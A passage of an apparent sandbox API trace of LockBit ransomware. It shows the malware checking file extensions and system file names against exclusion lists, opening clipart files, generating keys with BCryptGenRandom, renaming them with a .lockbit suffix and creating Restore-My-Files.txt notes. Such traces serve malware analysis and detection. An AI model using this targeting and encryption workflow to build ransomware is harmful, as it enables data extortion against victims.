lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0168.169] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0168.169] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0168.170] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0168.170] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0168.170] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0168.170] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0168.170] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0168.170] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0168.171] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01255G.GIF") returned 1 [0168.171] lstrcmpiW (lpString1="ntldr", lpString2="PH01255G.GIF") returned -1 [0168.171] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01255G.GIF") returned -1 [0168.171] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01255G.GIF") returned -1 [0168.171] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01255G.GIF") returned -1 [0168.171] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01255G.GIF") returned 1 [0168.171] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01255G.GIF") returned -1 [0168.171] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.171] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF") returned=".GIF" [0168.171] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0168.171] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0168.171] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0168.172] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0168.172] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0168.173] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0168.173] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0168.173] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF.lockbit") returned 72 [0168.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01255g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0168.173] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.173] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.173] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7765) returned 1 [0168.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.174] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.179] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.179] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.179] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.180] free (_Block=0x1fa2ed8) [0168.180] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01255G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.180] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.180] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d799000, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d799000, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01265U.BMP", cAlternateFileName="")) returned 1 [0168.180] lstrcmpiW (lpString1=".", lpString2="PH01265U.BMP") returned -1 [0168.180] lstrcmpiW (lpString1="..", lpString2="PH01265U.BMP") returned -1 [0168.180] PathFindExtensionW (pszPath="PH01265U.BMP") returned=".BMP" [0168.180] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.180] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.180] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.180] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.180] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.180] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.180] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.180] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.181] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.181] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.181] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.182] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01265U.BMP") returned 1 [0168.182] lstrcmpiW (lpString1="ntldr", lpString2="PH01265U.BMP") returned -1 [0168.182] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01265U.BMP") returned -1 [0168.182] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01265U.BMP") returned -1 [0168.182] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01265U.BMP") returned -1 [0168.182] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01265U.BMP") returned 1 [0168.182] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01265U.BMP") returned -1 [0168.182] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.183] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP") returned=".BMP" [0168.183] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.183] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.183] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.184] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.184] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.184] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.184] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.184] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.184] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP.lockbit") returned 72 [0168.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01265u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0168.185] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.185] malloc (_Size=0x40068) returned 0x3ef0008 [0168.185] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=31752) returned 1 [0168.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0168.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0168.186] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.190] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.190] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.191] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.191] free (_Block=0x1fa2ed8) [0168.191] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.191] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.192] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8bf3500, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb8bf3500, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01332U.BMP", cAlternateFileName="")) returned 1 [0168.192] lstrcmpiW (lpString1=".", lpString2="PH01332U.BMP") returned -1 [0168.192] lstrcmpiW (lpString1="..", lpString2="PH01332U.BMP") returned -1 [0168.192] PathFindExtensionW (pszPath="PH01332U.BMP") returned=".BMP" [0168.192] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.192] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.192] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.192] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.192] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.193] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.193] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.193] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01332U.BMP") returned 1 [0168.194] lstrcmpiW (lpString1="ntldr", lpString2="PH01332U.BMP") returned -1 [0168.194] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01332U.BMP") returned -1 [0168.194] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01332U.BMP") returned -1 [0168.194] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01332U.BMP") returned -1 [0168.194] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01332U.BMP") returned 1 [0168.194] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01332U.BMP") returned -1 [0168.194] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.194] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP") returned=".BMP" [0168.194] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.194] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.194] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.195] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.196] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.196] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.196] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP.lockbit") returned 72 [0168.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01332u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0168.200] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, 